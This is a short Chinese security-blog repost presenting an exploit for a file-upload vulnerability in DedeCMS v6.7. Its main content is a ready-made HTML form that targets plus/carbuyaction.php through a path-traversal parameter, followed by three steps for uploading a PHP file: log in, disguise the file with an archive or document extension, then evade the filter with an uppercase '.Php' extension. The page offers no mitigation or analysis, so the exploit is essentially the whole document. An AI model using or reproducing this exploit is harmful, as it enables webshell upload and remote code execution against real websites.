织梦dedecms v6.7最新上传漏洞

没穿底裤 2019年12月31日20:34:39评论393 views字数 526阅读1分45秒阅读模式
摘要

EXp:<form action="http://www.0day5.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">

EXp:

<form action="http://www.0day5.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">

file:<input name="uploadfile" type="file" /><br>

newname:<input name="newname" type="text" value="myfile.Php"/>

<button class="button2" type="submit">提交</button><br><br>

1,必须登陆用户。<br>

2,将待上传PHP文件扩展名改为“zip|gz|rar|iso|doc|xsl|ppt|wps”其中之一。<br>

3,newname为上传后的新文件名,扩展名使用大写绕过,如“Php”。<br>

</form>

图文观赏

http://115.com/file/e7jevn08#织梦cms v6.7最新上传漏洞.doc

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日20:34:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   织梦dedecms v6.7最新上传漏洞http://cn-sec.com/archives/75109.html

发表评论

匿名网友 填写信息